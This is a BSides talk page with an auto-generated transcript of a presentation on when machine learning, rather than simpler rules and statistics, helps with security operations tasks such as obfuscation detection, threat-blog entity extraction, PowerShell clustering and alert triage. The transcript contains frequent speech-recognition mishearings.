← All talks

Clippy or SkyNet for your SOC? Machine Learning in Security Operations

BSides Peru · 202242:0984 viewsPublished 2022-09Watch on YouTube ↗
Speakers
Tags
CategoryTechnical
StyleTalk
About this talk
Preeti Ravindra examines when machine learning and analytics solve real security operations problems and when simpler rule-based approaches suffice. Drawing on experiments in decision support and threat detection, she maps solution complexity against guidance value, discusses failed ML projects in security, and outlines what teams need to successfully deploy data-driven security programs—including data architecture, cross-training, and realistic expectations.
Show transcript [en]

good evening everyone thank you very much for sticking around for the for this talk I'm really excited to talk about Clippy or Skynet for your security operations center a little bit about me I don't I mean I love solving security problems with data and when I say I love solving security problems with data I don't mean just machine learning or fancy deep learning I mean everything rules Analytics statistics machine learning and deep learning what I have done so far I've delivered a couple of analytics Ai and ml solutions for both security vendors as well as Enterprise security teams so I've had a perspective from both sides what I really like doing is helping security teams succeed in adopting

uh data-driven approaches in their security operations center I advocate for risk driven security approaches I know a lot of focus goes on threats but I really like concentrating on the risks and what makes sense to mitigate those risks and finally I mean inventor on three patterns and I'm still a novice open source contributor and just fun fact I started my journey in Pittsburgh my security journey in Pittsburgh so I'm really happy to be here speaking at besides Pittsburgh I met a Carnegie Mellon did my internship here of course I love dark teens as evident from my slides uh so a quick show of hands how many people have dabbled with data science here or statistics

okay good I have the amazing right kind of audience and how many people have actually implemented uh machine learning Solutions in your Security operation centers great uh I definitely see one for one hand there that's that's amazing and was it successful oh okay cool very cool uh it's always good to know um that people have at least tried to dabble with it and play with it and I'm just maybe the other question makes more sense how many people have seen failed machine learning projects great okay that's that's also great we have all the right kind of audience here um I think everybody has seen this statistic 85 percent of AI projects will fail through 2022. this was something

that was told in 2018 and this has been the case so far um and this is not necessarily uh just limited to security operations but also across all domains but still already makes it even harder and that's because of the adversarial nature of our domain and 90 percent fail before they're even started and one of the reasons why they fail is because most of the times there is a mismatch in the problem that we choose as well as the approach that we choose to try and solve that problem and just like any other learning curve I think one thing that I have found in my experience is that the moment you get your first machine learning solution working and

deployed it becomes much easier to deploy more solutions and you kind of get a feel or hang of what would work and what would not work

yeah so today I'll talk about all the experiments that I have done in my career Journey so far and this is all specific to security security operations uh all the experiments are either decision support related or threat detection related and what I mean by decision support is where you use analytics machine learning solutions to help Drive to help Drive operational efficiency and to help the analysts make a decision as opposed to making a decision for them I'll also be talking or touching briefly upon the different kinds of solution complexities and you know why I thought one approach would work better than the other and in what circumstances and then later switch gears a bit uh to

talk about what it takes to build a successful data science program and then finally wrap it up with certain takeaways like what what are some of the good bad and ugly things that I have seen so I think that's that's what I'll wrap up with another interesting thing that I wanted to touch upon in this talk is uh return on investment security operations as a whole has multiple moving components and one such moving component is the the risk appetite of a given organization what amount of risk are we willing to take and what amount of risk are we not willing to take and how does that drive the bottom line for the operations as well and what does it mean

from a Security Act or threat efficacy purpose so coming back to the title of the talk um this is uh this is a slide where I have charted the complexity of the solutions along with the guidance that these different machine learning or analytics or any data-driven solution provides so why I wanted to point out here is that all right I've charted this um guidance is increasing from left to right and complexity is increasing from top to bottom um the image themselves I wanted to bring your attention to the images the image themselves uh they are generated by a recent advancement uh in um Ai and machine learning this is called the doll e model uh the doll e

model basically takes a language input prompt and generates uh an image so of all the things that we thought would that AI would replace I never thought artists would be one of it one of them or meme creators maybe our AIS will be creating memes as well so the first image The Prompt that I gave for Dolly was clippy and clearly it doesn't look like clippy I mean it's there the outline is there but for me I don't know it looks more like a stethoscope or again with some missing components it definitely doesn't look like clippy to me and then I gave Dolly the prompt of Skynet and Skynet this was an interesting picture at least

it was related um this is a picture of Terminator I was expecting to see something else for Skynet like I was expecting to see the logo of Skynet come up as shown in the Terminator franchisee uh so if anybody wants to play around with these prompts you can visit crayon.com and that's where uh the dolly creators have a back-end provided so you can just play with these uh prompts a fun fact here as well or just another thing that I was playing around so when I gave Skynet Helena Bonham Carter it actually showed me a picture of Helena Bonham Carter with a cyborg-like image and I thought that was funny but I didn't want to put it here it was not it was an

eyesore

just just coming back here um so I think I'm kind of foreshadowing already clippy or Skynet so this dolly model is state of the art it has 16 billion parameters so if you think about a straight line a linear regression line that's y equals MX plus C that's just like one parameter but this dolly model is 16 billion parameters and when I gave clippy uh despite seeing a lot of words to image translations I think this was the best it could come up with so let's talk about The Usual Suspects I like to call these The Usual Suspects because um because you must have seen a lot of these things in Vendor talks so what are

some of the most common applications where you we could leverage data to solve the problems in security operations there are multiple problems here so the first one is threat detection again here a huge umbrella under uh threat detection so you can have malware detection and outliers or user entity behavioral analytics I think more recently the trend is to collect micro detections and chain them up into an attack sequence because we all love miter attack framework uh so that's with the malware detection aspect the other data-driven Solutions are decision support and operational efficiency I think this is one of my personal favorites because this is again helping uh drill down on the actual volume of data and alerts that an

analyst has to weed through as opposed to as opposed to just coming up with cool detection cool or and more detections which may or may not necessarily be useful so I think there are some really interesting um use cases around the decision support and then there's workflow in improvements workflow improvements are typically trying to integrate all these data driven Solutions better with the tool chain that is in a security Operation Center and there are a lot of playbooks that could be automated and all of these are data driven approaches you don't necessarily need fancy machine learning you can just look at some of the previous statistical dispositions and you could come up with some good workflow improvements

yeah so uh Game of Thrones Game of Thrones fans would probably know uh trial by dead trial by combat and this trial by fire and uh I think I have done the trial by fire which is mostly uh diving deep into a lot of these experiments and sometimes coming out unscathed and sometimes being burnt so I'll briefly touch upon each of these quadrants like the first quadrant threat detection like what were some of the experiments that I did with thread digestion at a very high level and then I'll touch upon um how do we automate some of the most common triage processes I think earlier during the day um Aaron and another gentleman was talking about

um how there are like so many alerts and events that somebody has to go through so definitely um I'll talk about how do we commonly I mean how do we tackle some of the triage processes and then the third one which is presenting the right kind of evidence so this is the critical part and I don't think a lot of us have gotten this right yet um most of the times I do see incident responders constantly trying to get the right kind of data when they need to make that decision and they don't have that information and I think that's what analytics or any data driven solution should address provide the right kind of incident response evidence like just

provide the evidence that is timely enough and then I think there's like this common decision support theme so I can definitely cover that as well all right so the first one the thread detection aspect uh yes another ISO slide uh but this is pretty old uh this is a very simple uh obfuscation script and this was when I was beginning my career around like 2016 2017 when expert kits were all the rage for uh the initial access as part of um and delivering uh ransomware payloads so expert kits would typically break the browser system sandbox um or Escape that sandbox and try to try to launch malware and most often that led to um ransomware

so the first image here is just an obfuscated script and the second image here is actually what it looked like the obfuscated so I was doing a lot of this manually and obviously nobody likes to do a lot of manual vulnerability research or expert development uh one of the things that I came up with was to see if I could sure I understand what the exploit looks like I understand what the obfuscation looks like but it's really hard to catch all of these things with um very specific rules especially when they're changing all the time and they make very slight changes like for example you can see parent n plus ode next to the script zero on in about the

fifth line and the first image um some other time they'll probably change that into a different kind of um string and that makes it a little difficult to catch these things so this is one uh example and expert kits May are gone now but I can assure you that very similar tactics are still being used especially when it comes to um fishing and when it comes to comes to a lot of Powershell or ramse script or first question so obfuscation is a fairly common technique um so what are some of the experiments like I think it's really critical to bring it down to a simple hypothesis or a simple problem statement and the problem statement was is this

obfuscated or not and in terms of gathering the data we gathered a lot of benign data malicious data as well so we gathered some Mauritius landing pages they were all labeled fortunately which is a boon and that's typically does not happen in the security space uh we also gathered some full P caps just to look at what we can extract out of it and how that could help augment our models the modeling was a supervised approach because this was the first way to start we had the luxury of having label data again it was a luxury so really happy that we had the label data challenges that that we had was um what we call in machine learning as

class imbalance which is a lot of data of one particular type which tends to be benign and a very small rate of malicious Mauritius data samples because the base rate of malware or malicious activity it's less than one percent in fact I want to go out on a limb and say it's like around point zero five percent uh so that's what the base rate is we had different approaches to address this so we thought let's try and generate data because um that could help us uh make a better model because machine learning models typically do well only when they have and they see equal sample so cat or a dog equals samples of cat equal samples

of dog and they work brilliant but in security they don't because we have this class and balance problem um false positive reduction this was something that was not a machine learning approach actually we used standard software engineering computer uh algorithms that could just help us reduce the false positives and a lot of domain knowledge went into this uh in order to identify what could be a potentially malicious Landing landing page in a way it's very similar to spam or no spam because that's the kind of data sets that we're all used to and that's the kind of data set that let us think that okay we can do more of machine learning in security so if you're keeping score the score

here is clippy ones kind of zero because we chose a very simple supervised machine learning traditional machine learning model and complemented that or augmented that with with um just basic traditional algorithms so why why were we successful I think we were successful because the hypothesis was simple and it was specific so it's really important to get that and then the data is labeled and it's in the order of millions so that was another reason why we were successful and coming back to the other um other quadrant in my slide which was how do we provide the most relevant information for a stock analyst who's doing the triage of the incidents and how do we automate this process

um even here the automation of this was uh it was a data mining approach which is um which has been there for a long time ever since the invention of search engines so we mine information from different logs and event telemetry and we also used statistical approaches based uh that were um that were leveraged as part of the rules in the past searches that a lot of these analysts who triage did so this was one way in which we um monetary in which we gathered or mined all the locally available information there were also a lot of other things that we can extract from logs this is very traditional computer programming just get information about what was

blocked whether there were like some Canary fights that were changed whether a process actually ran so so these are some of the things this is still a data driven data-driven approach because you're still using the statistical aspects not necessarily machine learning and deep learning um and I think this is where the machine learning and the Deep learning component comes into place so this is kind of a moonshot idea where with heart let's take this to another level we have a lot of information that's available in the form of structured data that's in databases that we get in for in from scissor bulletins or DHS bulletins we get a lot of that data we have a lot of other local

telemetries it's also completely um it's also completely structured but a lot of the time stock analysts also go look up blog articles they look up a lot of they read a lot they do a lot of unstructured data so we thought let's take it one step further and automate this as well um and and as you can see this is like a Blog I served during the wannacry um attacks that were happening and we didn't I mean we implemented some sort of a machine learning uh model that could help extract all these security entities uh what I call a security entities are things that are that remotely look like security words um nothing like um Associated uh it should mostly look

like Eternal blue SMB exploits so these are some of the security entities and then there were also um some timestamps and the the relationship so we wanted to extract all of this in an automated way using natural language processing so as an example here this is one successful example so you can see that on June 27 uh 2017 uh the patriarch may be spreading by the Eternal blue exploit that that was used in wannacry attack from last month and we wanted to present this evidence and how did we do that so we presented this evidence so obviously the ones that are explicitly provided in the blog article makes sense it's directly extracted using natural language processing but there are some

interesting statements there that said um patio ransomware may be spreading by the Eternal blue exploit used in the wannacry attack from last month and if you look at the timestamp that we provide it actually goes back one month for the appropriate um security entity and the relationship so this is named entity recognition uh standard uh procedure but but but this was very interesting because this is one of the few successful cases where this this worked and it almost felt like leveraging this in order to in order to make the automated triage process much efficient uh it seemed like a huge operational burden so these were I mean as I mentioned like these were some of the

um experiments that I did and how did we do this we annotated a lot of blog articles uh we did statistical modeling which is expectation maximization based and then we also tried deep learning and deep learning was mostly used to to uh what was mostly used to generate summary outcomes um I'm not sure if people are here are familiar but gpd3 is one of those open AI recent models that can actually generate a summary based on a dialogue or based on a textbook so we tried some of these approaches to see if this can actually help uh one of the challenges that we faced was that we wanted to evaluate the efficacy of the information extraction

and it was very complicated um I think blue score is the standard where everybody uses the number of unique things that the machine learning model extracted and how a human annotated it but um overall the blue score was something that we definitely used but it was from a domain perspective it was very challenging because we did not know how to evaluate the outcome should we consider it a success if the model was able to extract everything from a given document or should we consider it a success if the model was able to extract it from exactly that given sentence where um the human also annotated so we had to come up with a bunch of custom

evaluations as well so with all of this we actually had an interesting approach of coming up with the unstructured data or extracting information from unstructured data and I think the score now is um oh sorry clippy's already won my bad uh Skynet minus one and oh that's fine but but this case um clippy was Zero because the traditional statistical models did not do well at all um this kind of model which is or the one that we really thought would do very well in terms of extracting all the entities and relationships it was it was not that efficient for that particular purpose but however generating summaries so the Deep learning model was really good at

generating summaries so I give a plus 0.5 for that just because it can generate good summaries so just in case you want a quick uh glimpse into what the alert looked like if you're an analyst and you just want to triage that if you read that summary okay if that worked great um so for this particular instance the simpler models did not work um the more complicated models were kind of we were asking Beyond state of the art at that point and then we got a a good summary so plus 0.5 for that um I think as you can see in the slide I mentioned like it is difficult for the model to disambiguate between you know a

Honeypot these are the language models that are trained on Wikipedia articles textbooks all these are huge models that are trained so it was difficult for the model to figure out a Honeypot from Winnie the Pooh and in the context of a Honeypot that's found in a security blog so that was really a challenge and of course from an operational perspective the amount of engineering that's needed to bring in these large models the cost the Costa obviously is one of the huge uh one of the biggest considerations in a security operations center um how much does it cost what would it how much would it uh cost to you know train these models maintain these models

so these are other engineering aspects that I'm not even touching in the stock but that is definitely one other thing and is it really adding value is it incremental value is it not incremental value is it really worth it can't we just solve this with a simpler solution can we just do regex so I think all of those are valid here um I think oops all right did I get the right one okay yeah yeah and I think now we're coming to the part where we wanted to talk about or where I want to talk more about how um you know how we can improve some of the um operational efficacy aspects so this is an example where

um we can actually help with threat hunting by dwindling down the data um so here we're trying to hunt for the malicious Powershell commands in an ocean of Powershell commands and this was an unsupervised approach this is slightly different from everything that we've seen so far which are supervised approaches this was an unsupervised approach um and the challenge here was that no analyst would go and label a Powershell command and say that this was a malicious Powershell command that was running nobody would do that so we did not have a lot of label data however the unsupervised machine learning approaches that we used were still very relevant especially when it came to clustering what it did was it would

definitely cluster a lot of similar looking Powershell commands and the pattern that emerged here was that we saw a pattern with a lot of partial commands that you would typically expect to see in your network and in your environment again here the knowledge of what you have or what you would consider normal in your environment becomes critical but this can definitely help someone in threat hunting right because you know that once these Powershell commands get clustered you can probably see that some some of these clusters are completely legitimate that these are something that you would expect to see and some of these are simply not and a lot of these things were are really helpful in

pivoting when you're doing threat hunting as well as trying to reduce the amount of data

the other one is I think this everybody is um or has heard of it at least once because everybody talks about alert fatigue for the sock analyst and everybody would like to reduce the uh priorities or like bubble down the low priority alerts for this experiment we had alert data with labels we had alerts from different uh vendors different data types and we used both supervised and semi-supervised machine learning the challenges here were also you know the lack of label data and identifying the drift in priority so for example today a particular alert type with a particular number or sorry with a particular event was high priority but three months down the line that was not and I think a lot

of this boils down again to the policies that are very specific to a given organization as well as the risk so how do we typically solve these problems right like when we don't have labeled data we try and get proxy label data and how do we do this we try to get these labels from the actions in the workflows uh that the sock analysts takes so in the end if they close it or in the end if they um ssoc analyst says that this is something that I escalated further then it's perhaps investigation worthy perhaps something that needs to be bubbled up and not bubbled on so these are some of the proxy labels that we

could get and um another challenge was how do we how does the model remember um is it memorizing what the analyst is saying or is it actually objectively um telling whether something is a threat or whether something is a priority or not and I think that's a very difficult question to answer uh and most of the current models they typically learn from the humans so they can do as good as the humans do and if in order to go beyond that um there needs to be other ways in which we have to approach this problem so another interesting part here was that we tried to do a lot of gamifying also to kind of get uh labels

um we had some interesting um interesting pop-ups that came up here uh that said uh you're only like 10 points away this is like the Uber ride level so we kind of have something similar to that uh as part of the gamification experience for the stock analysts so over here both of the models that we used as part of the Powershell clustering as well as for the alert prioritization both the models were we used were very simple traditional machine learning models you know deep learning so clippy gets two again and um Skynet minus 0.5 here because we did try one of those um word emitting models that are commonly used in deep learning um where we try and train the model

based on what are things are similar and it provides the score and this was very interesting so the similarity of say something that was virus detected and virus blocked the semantics of them is completely different one A virus detected means okay you have detected it and virus blocked means um okay you have detected and blocked it so the action that somebody would take would be completely different here and in this case it was very interesting to see that it was the exact same similarity so probably did not quite learn much so now let's shift gears a bit so we saw that most of the times clippy is good enough for the current use cases that

we're targeting uh and what what do we really need in order to successfully deploy or successfully bring any data-driven solution uh for security obviously the people um one of the things that I noticed when when I'm interviewing others also or when I'm getting job description uh job requisition descriptions I noticed that the description requirement or the job requirement for somebody who's a data scientist is um security is um is a bonus Point uh you need to know how to engineer mine large-scale data and you need to write production code so this is one set of job descriptions that I've seen the other set of job descriptions that I've seen is you need to do data science figure out how the

cost supports the product management as well as the customer success teams to figure out how much of these models are being adopted so it looks like there's a lot of us there's a huge ask you know um and I think I'd like to borrow one of the um one of the lines from Joshua Neil from uh from secure Onyx and he says build full stack teams not full stack data scientists it's extremely difficult to become a full stack data scientist so another aspect is if you are looking to start a security machine learning program a statistician or an ml engineer shouldn't be your first hire your first hire should be somebody who is a data

architect who can work with the security teams to identify what exactly what kind of data sets need to be curated how to govern those data sets I think those are some of the things that we really need to really need to look into and then cross-train your statisticians and security practitioners I can give you an example so when training one of these models the data scientists totally as part of the feature Engineering Process um they completely omitted or basically gave a wild card for the IP address and everything else was modeled um if a security professional was there and was advising the data scientist then the security practitioner would have immediately said that this will not work

this is exactly the kind of loophole that somebody in that an attacker would leverage to change the decision of the model so try to cross-train and then processes I cannot emphasize this much I think the first a lot of places where I've been the first things that I get asked is um we want you to build that machine learning model that will help us catch apt-28 and I think we're far away from that I don't think we want to build a machine learning model that will catch AP to 28 right off the bat I think that's not a realistic ask um so definitely try and work with your security teams work with your leaders set expectations

and if you are an Enterprise security team try to use the data that you already have try to Leverage The workflows and the process that you do try to leverage that for data-driven approaches instead of starting new tools instead of starting new um new processes try to leverage the existing ones and I think another point that I noticed in a lot of data science teams is that data science teams um are sometimes forced to fit into an agile framework and it works in software engineering because you know the kind of problem you want to solve you know what kind of solution there is so you can work work on it that way but with data

science I noticed that people say oh I want to solve this problem I want to catch apt-29 maybe your data does not support it you cannot really catch apt-29 I want to solve user behavioral analytics or I want to detect Insider threats for you know trading my stocks I think that is something you'll have to look into and set expectations only after looking at and exploring the data from a technology perspective I think it's again um one of the things that's often overlooked is the mlops practices how do we Harden the systems how do we make them robust and data scientists often forget their baselines they try to go for the moon shots let's use the latest Cutting Edge

but we totally forget our bass lines can we really improve on these baselines whether these are rules based or or statistics based can we really improve these and lastly um this is the Good Bad and the Ugly so just summarizing everything that I mentioned here um I think the good part is I think more uh mature uh security teams and data science teams they actually work together and they're trying to find find that problem and solution match quality they're trying to find that fit and Occam's razor actually works start with the simplest problem for which you have the data there are some really cool advancements also that are happening so I think the security Community has to keep an eye

out on all the advancements that is happening in the AI and machine learning space maybe now is not the right time to try them and try to bring them into production because they're definitely not battle ready or battle tested uh so it's important there is a lot of interesting work that's going on there and with a lot of research and proper development and the right guidance I think there is a lot of potential to use these Advanced machine learning and deep learning models and another thing is in general we're always focused on finding the threat which is the needle and we really don't have that magnet so instead maybe the approach should be let's eliminate all

the noise like let's remove the haste tag and then the needle will automatically reveal itself so maybe we have the tools to get the haystack not the needle so let's remove the haystack um the bad the bad parts that I've noticed is the return on investment is inversely proportional to the model complexity and this is an engineering challenge that needs more um more resources I think most most folks are interested in trying to build the latest models and not quite as interested as getting the engineering effort in place so that's definitely one thing and the mismatched expectations right everybody wants to work on the latest and greatest but very few things would actually work so

it's really hard to retain those data scientists who can work in security they all want to go build recommendation engines and generate ads so that people can click on the ads um and I think the other bad thing is again let's focus on hardening uh this is one of my pet peeves the ugly part um there's not a lot of open research I wish the community does more open research share more data sets share more code and that way we can all test each other's models determine what is actually valuable what can be improved how it can be improved I think that there's there needs to be more push towards open sourcing the models as well

as the data sets within the security community that works for security uh yeah that's it for me and uh I think Now's the Time For questions if any

uh sorry the question was uh do we see adversaries using machine learning and oh great question uh yes adversarial machine learning is a whole space in itself and that is something that I definitely did not touch today I only spoke about the defensive aspect uh adversarial machine learning is a thing this is where there are a lot of different kinds of attacks so for example um I think in the news most prominently you see uh you know autonomous cars there are misreading some signs because the machine learning decision boundaries are different you also see data poisoning right how somebody could actually poison the data on which the model is trained so you're uh poisoning it from the in the initial part this is

akin to the supply chain attacks that we see um can we detect it there are a couple of tools that are being developed uh this is mostly for data scientists to make their models more robust so that they don't get attacked this way so this is we're trying to be more proactive uh in terms of detection um it's really difficult to say whether something looks like a normal request to a machine learning model that is hosted in the cloud you could just send an API and you can get a response and it's really difficult to know whether somebody is actually trying to trick the model um and traditional detection approaches would apply here as well look at the

rates at which they're requesting for these predictions and look at the kind of um look at the kind of data points that they're requesting it for are they within each other because that's when you can infer that they are trying to infer the decision boundary of the model yeah does that answer your question

any other questions [Applause]